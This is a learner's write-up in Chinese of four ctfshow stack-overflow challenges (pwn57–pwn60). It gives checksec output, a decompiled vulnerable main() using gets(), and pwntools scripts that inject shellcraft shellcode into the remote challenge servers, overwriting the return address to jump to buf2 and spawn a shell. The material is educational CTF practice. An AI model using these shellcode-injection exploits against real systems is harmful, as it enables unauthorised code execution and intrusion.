ctfshow做题笔记—栈溢出—pwn57~pwn60
目录
前言
一、pwn57(先了解一下简单的64位shellcode吧)
二、pwn58
三、pwn59(64位 无限制)
四、pwn60(入门难度shellcode)
前言
往前写了几道题,与shellcode有关,关于shellcode还不是太懂。
一、pwn57(先了解一下简单的64位shellcode吧)
┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn57
[*] '/home/kali/桌面/ctfshoww/pwn57'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
Stripped: No没啥。
应该也是直接执行:
from pwn import *
p=remote("pwn.challenge.ctf.show",28235)
p.interactive()
二、pwn58
┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn58
[*] '/home/kali/桌面/ctfshoww/pwn58'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
Stripped: No也没有开啥保护。
logo明显提示用shellcode,所以我们需要发送sellcode。
Exp:
from pwn import *
e=ELF("./pwn58")
p=remote("pwn.challenge.ctf.show",28178)
shellcode=asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()
三、pwn59(64位 无限制)
Checksec:
┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn59
[*] '/home/kali/桌面/ctfshoww/pwn59'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
Stripped: No是64位的64位 无限制
也是写入shellcode。
看一下ROP:
ROPgadget --binary ./pwn50 --only "pop rbx|ret"
Gadgets information
============================================================
0x00000000004004fe : ret
0x0000000000400d74 : ret 0xfff9
0x0000000000400642 : ret 1
Unique gadgets found: 3ret=0x4004fe
一开始我是这样写的;
from pwn import *
p = remote('pwn.challenge.ctf.show',28256)
shellcode = asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()但是打不通,问了问人机,加了一个架构,就能打通了:
from pwn import *
context.arch='amd64'
p = remote('pwn.challenge.ctf.show',28256)
shellcode = asm(shellcraft.sh())
payload=shellcode
p.sendline(payload)
p.interactive()
四、pwn60(入门难度shellcode)
查看一下程序:
┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --file=pwn60
[*] '/home/kali/桌面/ctfshoww/pwn60'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
Stripped: No
Debuginfo: Yes没开什么保护。
主要是这个函数:
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [sp+1Ch] [bp-64h]@1
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 1, 0);
puts("CTFshow-pwn can u pwn me here!!");
gets((char *)&v4);
strncpy(buf2, (const char *)&v4, 0x64u);
printf("See you ~");
return 0;
}我们需要利用buf2,在其后面接shellcode
buf2_ar=0x804A080
我们需要用pwndbg确定一下:
确定偏移是112
Exp:
from pwn import *
context.log_level='debug'
p=remote("pwn.challenge.ctf.show",28264)
e=ELF("./pwn60")
buf2_ar=e.sym['buf2']
offset=112
shellcode=asm(shellcraft.sh())
payload=shellcode.ljust(offset,b'a')+p32(buf2_ar)
p.recvuntil("CTFshow-pwn can u pwn me here!!")
p.sendline(payload)
p.interactive()
继续学习中......